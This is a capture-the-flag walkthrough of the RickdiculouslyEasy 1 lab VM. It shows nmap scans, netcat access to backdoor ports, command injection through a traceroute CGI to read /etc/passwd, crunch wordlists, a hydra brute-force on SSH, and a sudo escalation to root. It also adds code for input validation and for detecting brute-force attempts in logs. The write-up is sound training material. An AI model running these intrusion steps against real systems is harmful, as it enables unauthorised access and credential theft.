
RickdiculouslyEasy 1: CTF walkthrough


Name: RickdiculouslyEasy: 1
Date release: 21 Sep 2017

Author: Luke
Series: RickdiculouslyEasy



We scan our local network to find the IP address of the vulnerable system.


Next, we use nmap to find all services and open ports.

root@kali:~/Desktop# nmap -A -O -p- -T5 --reason

Starting Nmap 7.60 ( ) at 2017-10-14 17:53 CEST
Warning: giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at :
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

1   11.19 ms pc-246.home (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds

FTP service

An FTP service is running and apparently it doesn’t require credentials.


Note, the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.


Cockpit web service

An HTTP service is running on an uncommon port; let’s check this one.


Second flag: FLAG {There is no Zeus, in your face!} – 10 Points

20 out of 130.


Unknown port 13337

We found an open port, let’s try to connect to it.

root@kali:~/Desktop# nc -nvv 13337
(UNKNOWN) [] 13337 (?) open
 sent 0, rcvd 41

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.


Unknown port 60000

A reverse shell publicly accessible? Interesting.

root@kali:~/Desktop# nc -nvv 60000
(UNKNOWN) [] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 

It’s a shell with a highly restrictive environment; only a few commands are usable, such as ls, cat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.


‘Main’ website

OK, this time we have a real website. First, the robots.txt file gives us really interesting information about the /cgi-bin/ directory: two tools seem to be usable.

root@kali:~/Desktop# curl
They're Robots Morty! It's ok to shoot them! They're just Robots!


Next, gobuster can be used to find a directory called passwords.

Let’s see what we can find in this directory.

root@kali:~/Desktop# curl
FLAG{Yeah d- just don't do it.} - 10 Points

Moreover, we can find a password hidden in the source code.

root@kali:~/Desktop# curl
<!DOCTYPE html>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first tool, root_shell.cgi, is a waste of time, but the second one allows us to use the tracert command via an HTML form.

We can easily find a vulnerability in this tool that will allow us to remotely execute commands on the server.
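The walkthrough does not show the CGI's source, so the following is an added example rather than the VM's code: it assumes the usual cause of this kind of flaw, user input concatenated into a shell command line, and contrasts it with a handler that validates the target and runs traceroute without a shell. All function names and sample inputs are hypothetical.

```python
import ipaddress
import re
import subprocess

# Characters that can appear in an IP literal or DNS name. Checked first so
# that shell metacharacters (and IPv6 "%scope" suffixes) never get further.
_ALLOWED = re.compile(r"[A-Za-z0-9.:-]+")
# One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def vulnerable_command(host: str) -> str:
    """Pattern to avoid: input pasted into a string that a shell will parse.

    Anything after ';', '|', '&&' or inside '$()' becomes a second command.
    """
    return "traceroute " + host  # e.g. handed to os.system() by the CGI


def validate_target(host: str) -> str:
    """Return host if it is an IP literal or a plain DNS name, else raise."""
    host = host.strip()
    if not _ALLOWED.fullmatch(host):
        raise ValueError("rejected target: %r" % host)
    try:
        ipaddress.ip_address(host)
        return host
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    labels = host.split(".")
    if len(host) <= 253 and all(_LABEL.fullmatch(label) for label in labels):
        return host
    raise ValueError("rejected target: %r" % host)


def safe_argv(host: str) -> list:
    """Argument vector for traceroute; a validated host cannot start with '-'."""
    return ["traceroute", validate_target(host)]


def run_traceroute(host: str, timeout: int = 30) -> str:
    """Run traceroute with no shell, so metacharacters are never interpreted."""
    result = subprocess.run(safe_argv(host), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout
```

Running the CGI under an account that cannot read other users' files limits the damage if validation is ever bypassed.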


Let’s enumerate the system and read files.

We will see that the cat command is unusable. Fortunately for us, other commands can be used to read the content of a file, such as less or more. Because less is more, let’s try to read the /etc/passwd file with the less command.

root@kali:/var/www/html# curl ""
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

We have three users.

Let’s try the previously found password with each one.

root@kali:/var/www/html# ssh Summer@ -p 22222
Summer@'s password: 
Last login: Wed Aug 23 19:20:29 2017 from
[Summer@pc-246 ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Summer@pc-246 ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[Summer@pc-246 ~]$ cat FLAG.txt
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[Summer@pc-246 ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@pc-246 ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.


Morty home folder

We are in the system and we have three users; let’s look at Morty’s home directory.

[Summer@pc-246 Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[Summer@pc-246 Morty]$

We have a password protected zip file and an interesting password stored in a JPG file.

Actually, not really safe or protected.


The password is: Meeseek.

We are now able to unzip the file.

[Summer@pc-246 Morty]$ unzip -d /tmp/
[] journal.txt password: 
  inflating: /tmp/journal.txt        
[Summer@pc-246 Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[Summer@pc-246 Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.


Rick home folder

The contents of Rick’s home folder.

[Summer@pc-246 RickSanchez]$ ls -lahR
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[Summer@pc-246 RickSanchez]$

As we can see, we have an ELF binary called safe.

Let’s copy this binary to my Linux machine.

[Summer@pc-246 RickSanchez]$ exit
Connection to closed.
root@kali:~/Desktop# scp -P22222 Summer@ .
Summer@'s password: 
safe                                                                  100% 8704   845.6KB/s   00:00    

We execute the binary, and apparently we need to use an argument.

root@kali:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!

Let’s try with the previously found hint.

root@kali:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order

1 uppercase character
1 digit
One of the words in my old bands name.�    @

Now we have to find Rick’s password.

Eighth flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.


Rick’s password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool that I will use for Rick’s password.
So, we need one uppercase character, one digit and one word from the name of Morty’s old band.

  • If, like me, you didn’t watch the series, you can find the name here:

According to crunch’s man page, we can choose the desired pattern and the minimum and maximum length.

       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string


        -t @,%^
              Specifies  a  pattern,  eg:  @@god@@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionaries, one with the word Flesh and another one with the word Curtains.

root@kali:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output

Finally we can use hydra for a dictionary attack on the SSH service.

root@kali:~/Desktop# hydra -l RickSanchez -P merged.txt ssh:// -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://
[22222][ssh] host:   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra ( finished at 2017-10-14 22:41:18

Fortunately for us, the merged file (both generated dictionaries) contains only 780 entries, and in less than a minute we find Rick’s password.
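Seen from the server side, a run like this leaves a dense burst of failed logins for one account followed by a success. The detection sketch below is an added example, not part of the original walkthrough: it parses OpenSSH password-authentication log lines and reports source/user pairs that reach a failure threshold, marking those where a login was then accepted. The log lines, addresses and threshold are constructed for illustration.

```python
import re
from collections import defaultdict

# OpenSSH logs: "Failed|Accepted password for [invalid user ]NAME from IP port N ssh2"
_AUTH = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")


def find_guessing(lines, threshold=5):
    """Return {(source, user): finding} for pairs that reach the threshold.

    'compromised' becomes True when an accepted login follows the failures,
    meaning the guessing run most likely found the password.
    """
    failures = defaultdict(int)
    findings = {}
    for line in lines:
        m = _AUTH.search(line)
        if not m:
            continue
        key = (m["src"], m["user"])
        if m["result"] == "Failed":
            failures[key] += 1
            if failures[key] >= threshold:
                entry = findings.setdefault(key, {"compromised": False})
                entry["failures"] = failures[key]
        elif key in findings:
            findings[key]["compromised"] = True
    return findings


def sample_log():
    """Constructed log lines using documentation addresses (not from the VM)."""
    lines = [
        "Oct 14 22:40:%02d pc-246 sshd[%d]: Failed password for RickSanchez "
        "from 192.0.2.10 port %d ssh2" % (42 + i, 2000 + i, 40000 + i)
        for i in range(8)
    ]
    lines.append("Oct 14 22:40:50 pc-246 sshd[2008]: Accepted password for "
                 "RickSanchez from 192.0.2.10 port 40008 ssh2")
    lines.append("Oct 14 22:41:02 pc-246 sshd[2010]: Failed password for "
                 "Summer from 192.0.2.77 port 50122 ssh2")
    return lines


if __name__ == "__main__":
    for (src, user), info in find_guessing(sample_log()).items():
        print(src, user, info)
```

Key-only SSH authentication or per-source rate limiting would have stopped the 780-guess run before it reached the valid password.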


Last Flag

For this last flag, we don’t need a tricky hack or a complex exploit. Always think of the basics.

Rick is a super user, so we only need to become root with the sudo command.

root@kali:~/Desktop# ssh RickSanchez@ -p 22222
RickSanchez@'s password: 
Last login: Sun Oct 15 07:44:36 2017 from
[RickSanchez@pc-246 ~]$ sudo su
[sudo] password for RickSanchez: 
[root@pc-246 RickSanchez]# 
[root@pc-246 RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@pc-246 RickSanchez]#

In a few seconds we have root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points